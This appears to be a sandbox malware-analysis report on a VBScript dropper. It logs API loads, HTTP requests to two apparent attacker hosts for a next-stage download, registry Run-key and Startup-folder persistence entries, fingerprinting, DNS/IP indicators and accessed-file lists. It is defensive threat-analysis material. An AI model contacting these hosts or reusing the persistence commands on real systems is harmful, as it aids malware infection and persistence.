DynamicLoader: ntdll.dll/NtOpenDirectoryObject
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: ntdll.dll/NtOpenFile
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtFsControlFile
DynamicLoader: ntdll.dll/NtQueryVolumeInformationFile
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetGroupGetInfo
DynamicLoader: NETAPI32.dll/NetGroupSetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupGetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupSetInfo
DynamicLoader: NETAPI32.dll/NetGroupGetUsers
DynamicLoader: NETAPI32.dll/NetLocalGroupGetMembers
DynamicLoader: NETAPI32.dll/NetLocalGroupEnum
DynamicLoader: NETAPI32.dll/NetShareEnum
DynamicLoader: NETAPI32.dll/NetShareGetInfo
DynamicLoader: NETAPI32.dll/NetShareAdd
DynamicLoader: NETAPI32.dll/NetShareEnumSticky
DynamicLoader: NETAPI32.dll/NetShareSetInfo
DynamicLoader: NETAPI32.dll/NetShareDel
DynamicLoader: NETAPI32.dll/NetShareDelSticky
DynamicLoader: NETAPI32.dll/NetShareCheck
DynamicLoader: NETAPI32.dll/NetUserEnum
DynamicLoader: NETAPI32.dll/NetUserGetInfo
DynamicLoader: NETAPI32.dll/NetUserSetInfo
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetApiBufferFree
DynamicLoader: NETAPI32.dll/NetQueryDisplayInformation
DynamicLoader: NETAPI32.dll/NetServerSetInfo
DynamicLoader: NETAPI32.dll/NetServerGetInfo
DynamicLoader: NETAPI32.dll/NetGetDCName
DynamicLoader: NETAPI32.dll/NetWkstaGetInfo
DynamicLoader: NETAPI32.dll/NetGetAnyDCName
DynamicLoader: NETAPI32.dll/NetServerEnum
DynamicLoader: NETAPI32.dll/NetUserModalsGet
DynamicLoader: NETAPI32.dll/NetScheduleJobAdd
DynamicLoader: NETAPI32.dll/NetScheduleJobDel
DynamicLoader: NETAPI32.dll/NetScheduleJobEnum
DynamicLoader: NETAPI32.dll/NetScheduleJobGetInfo
DynamicLoader: NETAPI32.dll/NetUseGetInfo
DynamicLoader: NETAPI32.dll/NetEnumerateTrustedDomains
DynamicLoader: NETAPI32.dll/DsGetDcNameW
DynamicLoader: NETAPI32.dll/DsRoleGetPrimaryDomainInformation
DynamicLoader: NETAPI32.dll/DsRoleFreeMemory
DynamicLoader: NETAPI32.dll/NetRenameMachineInDomain
DynamicLoader: NETAPI32.dll/NetJoinDomain
DynamicLoader: NETAPI32.dll/NetUnjoinDomain
DynamicLoader: WKSCLI.DLL/NetWkstaGetInfo
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExW
DynamicLoader: kernel32.dll/GetVolumePathNameW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SECURITY.DLL/InitSecurityInterfaceW
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/NtSetSystemEnvironmentValue
DynamicLoader: ntdll.dll/NtQuerySystemEnvironmentValue
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQueryDirectoryObject
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtOpenDirectoryObject
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: ntdll.dll/NtOpenFile
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtFsControlFile
DynamicLoader: ntdll.dll/NtQueryVolumeInformationFile
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetGroupGetInfo
DynamicLoader: NETAPI32.dll/NetGroupSetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupGetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupSetInfo
DynamicLoader: NETAPI32.dll/NetGroupGetUsers
DynamicLoader: NETAPI32.dll/NetLocalGroupGetMembers
DynamicLoader: NETAPI32.dll/NetLocalGroupEnum
DynamicLoader: NETAPI32.dll/NetShareEnum
DynamicLoader: NETAPI32.dll/NetShareGetInfo
DynamicLoader: NETAPI32.dll/NetShareAdd
DynamicLoader: NETAPI32.dll/NetShareEnumSticky
DynamicLoader: NETAPI32.dll/NetShareSetInfo
DynamicLoader: NETAPI32.dll/NetShareDel
DynamicLoader: NETAPI32.dll/NetShareDelSticky
DynamicLoader: NETAPI32.dll/NetShareCheck
DynamicLoader: NETAPI32.dll/NetUserEnum
DynamicLoader: NETAPI32.dll/NetUserGetInfo
DynamicLoader: NETAPI32.dll/NetUserSetInfo
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetApiBufferFree
DynamicLoader: NETAPI32.dll/NetQueryDisplayInformation
DynamicLoader: NETAPI32.dll/NetServerSetInfo
DynamicLoader: NETAPI32.dll/NetServerGetInfo
DynamicLoader: NETAPI32.dll/NetGetDCName
DynamicLoader: NETAPI32.dll/NetWkstaGetInfo
DynamicLoader: NETAPI32.dll/NetGetAnyDCName
DynamicLoader: NETAPI32.dll/NetServerEnum
DynamicLoader: NETAPI32.dll/NetUserModalsGet
DynamicLoader: NETAPI32.dll/NetScheduleJobAdd
DynamicLoader: NETAPI32.dll/NetScheduleJobDel
DynamicLoader: NETAPI32.dll/NetScheduleJobEnum
DynamicLoader: NETAPI32.dll/NetScheduleJobGetInfo
DynamicLoader: NETAPI32.dll/NetUseGetInfo
DynamicLoader: NETAPI32.dll/NetEnumerateTrustedDomains
DynamicLoader: NETAPI32.dll/DsGetDcNameW
DynamicLoader: NETAPI32.dll/DsRoleGetPrimaryDomainInformation
DynamicLoader: NETAPI32.dll/DsRoleFreeMemory
DynamicLoader: NETAPI32.dll/NetRenameMachineInDomain
DynamicLoader: NETAPI32.dll/NetJoinDomain
DynamicLoader: NETAPI32.dll/NetUnjoinDomain
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExW
DynamicLoader: kernel32.dll/GetVolumePathNameW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExW
DynamicLoader: kernel32.dll/GetVolumePathNameW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: SECURITY.DLL/InitSecurityInterfaceW
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/NtSetSystemEnvironmentValue
DynamicLoader: ntdll.dll/NtQuerySystemEnvironmentValue
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQueryDirectoryObject
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtOpenDirectoryObject
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: ntdll.dll/NtOpenFile
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtFsControlFile
DynamicLoader: ntdll.dll/NtQueryVolumeInformationFile
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetGroupGetInfo
DynamicLoader: NETAPI32.dll/NetGroupSetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupGetInfo
DynamicLoader: NETAPI32.dll/NetLocalGroupSetInfo
DynamicLoader: NETAPI32.dll/NetGroupGetUsers
DynamicLoader: NETAPI32.dll/NetLocalGroupGetMembers
DynamicLoader: NETAPI32.dll/NetLocalGroupEnum
DynamicLoader: NETAPI32.dll/NetShareEnum
DynamicLoader: NETAPI32.dll/NetShareGetInfo
DynamicLoader: NETAPI32.dll/NetShareAdd
DynamicLoader: NETAPI32.dll/NetShareEnumSticky
DynamicLoader: NETAPI32.dll/NetShareSetInfo
DynamicLoader: NETAPI32.dll/NetShareDel
DynamicLoader: NETAPI32.dll/NetShareDelSticky
DynamicLoader: NETAPI32.dll/NetShareCheck
DynamicLoader: NETAPI32.dll/NetUserEnum
DynamicLoader: NETAPI32.dll/NetUserGetInfo
DynamicLoader: NETAPI32.dll/NetUserSetInfo
DynamicLoader: NETAPI32.dll/NetGroupEnum
DynamicLoader: NETAPI32.dll/NetApiBufferFree
DynamicLoader: NETAPI32.dll/NetQueryDisplayInformation
DynamicLoader: NETAPI32.dll/NetServerSetInfo
DynamicLoader: NETAPI32.dll/NetServerGetInfo
DynamicLoader: NETAPI32.dll/NetGetDCName
DynamicLoader: NETAPI32.dll/NetWkstaGetInfo
DynamicLoader: NETAPI32.dll/NetGetAnyDCName
DynamicLoader: NETAPI32.dll/NetServerEnum
DynamicLoader: NETAPI32.dll/NetUserModalsGet
DynamicLoader: NETAPI32.dll/NetScheduleJobAdd
DynamicLoader: NETAPI32.dll/NetScheduleJobDel
DynamicLoader: NETAPI32.dll/NetScheduleJobEnum
DynamicLoader: NETAPI32.dll/NetScheduleJobGetInfo
DynamicLoader: NETAPI32.dll/NetUseGetInfo
DynamicLoader: NETAPI32.dll/NetEnumerateTrustedDomains
DynamicLoader: NETAPI32.dll/DsGetDcNameW
DynamicLoader: NETAPI32.dll/DsRoleGetPrimaryDomainInformation
DynamicLoader: NETAPI32.dll/DsRoleFreeMemory
DynamicLoader: NETAPI32.dll/NetRenameMachineInDomain
DynamicLoader: NETAPI32.dll/NetJoinDomain
DynamicLoader: NETAPI32.dll/NetUnjoinDomain
Performs HTTP requests potentially not found in PCAP.
url: curtisjnr.dynu.net:1901//is-ready
url: curtisjnr.dynu.net:1901//is-ready
url: britianica.uk.com:5000//is-ready
url: britianica.uk.com:5000//is-ready
Reads data out of its own binary image
self_read: process: wscript.exe, pid: 3012, offset: 0x00000000, length: 0x00000040
self_read: process: wscript.exe, pid: 3012, offset: 0x000000f0, length: 0x00000018
self_read: process: wscript.exe, pid: 3012, offset: 0x000001e8, length: 0x00000078
self_read: process: wscript.exe, pid: 3012, offset: 0x00018000, length: 0x00000020
self_read: process: wscript.exe, pid: 3012, offset: 0x00018058, length: 0x00000018
self_read: process: wscript.exe, pid: 3012, offset: 0x000181a8, length: 0x00000018
self_read: process: wscript.exe, pid: 3012, offset: 0x00018470, length: 0x00000010
self_read: process: wscript.exe, pid: 3012, offset: 0x00018640, length: 0x00000012
self_read: process: wscript.exe, pid: 2556, offset: 0x00000000, length: 0x00000040
self_read: process: wscript.exe, pid: 2556, offset: 0x000000f0, length: 0x00000018
self_read: process: wscript.exe, pid: 2556, offset: 0x000001e8, length: 0x00000078
self_read: process: wscript.exe, pid: 2556, offset: 0x00018000, length: 0x00000020
self_read: process: wscript.exe, pid: 2556, offset: 0x00018058, length: 0x00000018
self_read: process: wscript.exe, pid: 2556, offset: 0x000181a8, length: 0x00000018
self_read: process: wscript.exe, pid: 2556, offset: 0x00018470, length: 0x00000010
self_read: process: wscript.exe, pid: 2556, offset: 0x00018640, length: 0x00000012
self_read: process: wscript.exe, pid: 1052, offset: 0x00000000, length: 0x00000040
self_read: process: wscript.exe, pid: 1052, offset: 0x000000f0, length: 0x00000018
self_read: process: wscript.exe, pid: 1052, offset: 0x000001e8, length: 0x00000078
self_read: process: wscript.exe, pid: 1052, offset: 0x00018000, length: 0x00000020
self_read: process: wscript.exe, pid: 1052, offset: 0x00018058, length: 0x00000018
self_read: process: wscript.exe, pid: 1052, offset: 0x000181a8, length: 0x00000018
self_read: process: wscript.exe, pid: 1052, offset: 0x00018470, length: 0x00000010
self_read: process: wscript.exe, pid: 1052, offset: 0x00018640, length: 0x00000012
A scripting utility was executed
command: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
command: wscript //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
command: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
command: wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
Behavior consistent with a dropper attempting to download the next stage.
File: /is-ready was requested from hosts: curtisjnr.dynu.net, britianica.uk.com
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
data: wscript.exe //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
data: wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
data: wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
data: wscript.exe //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lXYOCrWYMY.vbs
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrlLRLG2Z1SYOAj.vbs
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrlLRLG2Z1SYOAj.vbs
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lXYOCrWYMY.vbs
Stores JavaScript or a script command in the registry, likely for persistence or configuration
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
data: wscript.exe //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
data: wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
data: wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
data: wscript.exe //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
A script process created a new process
wscript.exe: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
wscript.exe: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
wscript.exe: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
A script process initiated network activity
request: http://britianica.uk.com:5000/is-ready
request: /is-ready
request: http://britianica.uk.com
request: http://britianica.uk.com
request: http://britianica.uk.com:5000/is-ready
request: /is-ready
request: http://britianica.uk.com:5000/is-ready
request: http://curtisjnr.dynu.net:1901/is-ready
request: /is-ready
request: http://curtisjnr.dynu.net
request: http://curtisjnr.dynu.net
request: http://curtisjnr.dynu.net:1901/is-ready
request: /is-ready
request: http://curtisjnr.dynu.net:1901/is-ready
Attempts to interact with an Alternate Data Stream (ADS)
file: C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION
Collects information to fingerprint the system

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 79.134.225.73 [VT] Switzerland
N 185.206.227.180 [VT] United Kingdom

DNS

Name Response Post-Analysis Lookup
curtisjnr.dynu.net [VT] A 185.206.227.180 [VT]
britianica.uk.com [VT] A 79.134.225.73 [VT]

Summary

C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs
C:\Windows\sysnative\C_20127.NLS
C:\Windows\SysWOW64\wshom.ocx
C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\ieframe.dll
C:\Users\user\AppData\Local\Temp\wscript.*
C:\Windows\System32\wscript.*
C:\
C:\Windows
C:\Windows\System32
C:\Windows\SysWOW64\wscript.exe
\??\MountPointManager
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\user\Desktop\desktop.ini
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe:Zone.Identifier
C:\Users\Public\Desktop
C:\Users
C:\Users\desktop.ini
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\user\Desktop
C:\Users\user\AppData\Roaming
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
C:\Windows\Fonts
C:\Windows\Fonts\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\user\Favorites
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Documents
C:\Users\user\Documents\desktop.ini
C:\Users\user\AppData\Roaming\
C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrlLRLG2Z1SYOAj.vbs
C:\Users\user\AppData\Local\Temp\wscript.exe
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lXYOCrWYMY.vbs
D:\
C:\Windows\System32\msxml3.dll\1
C:\Windows\System32\msxml3.dll
C:\Windows\System32\wbem\wbemdisp.tlb
C:\Windows\SysWOW64\stdole2.tlb
C:\Windows\SysWOW64\netmsg.dll
C:\Program Files (x86)\Common Files\System\ado\msader15.dll
C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\sysnative\wbem\Logs\
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\sysnative
C:\Windows\sysnative\
C:\Windows\
C:
C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION
D:
C:\Windows\sysnative\Branding\basebrd\basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\sysnative\tzres.dll
\??\PIPE\wkssvc
C:\DosDevices\pipe\
\??\PIPE\srvsvc
C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs
C:\Windows\SysWOW64\wshom.ocx
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\ieframe.dll
C:\
C:\Windows
C:\Windows\System32
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\user\Desktop\desktop.ini
C:\Users\desktop.ini
C:\Users
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Windows\Fonts\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Documents\desktop.ini
\Device\KsecDD
C:\Windows\SysWOW64\wscript.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs
C:\Windows\System32\msxml3.dll\1
C:\Windows\System32\msxml3.dll
C:\Windows\System32\wbem\wbemdisp.tlb
C:\Windows\SysWOW64\stdole2.tlb
C:\Windows\SysWOW64\netmsg.dll
C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs
C:\Program Files (x86)\Common Files\System\ado\msader15.dll
C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION
C:\Windows\Branding\Basebrd\basebrd.dll
C:
C:\Windows\sysnative\tzres.dll
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs
C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrlLRLG2Z1SYOAj.vbs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lXYOCrWYMY.vbs
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION
\??\PIPE\wkssvc
\??\PIPE\srvsvc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20127
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\409
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\wscript.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
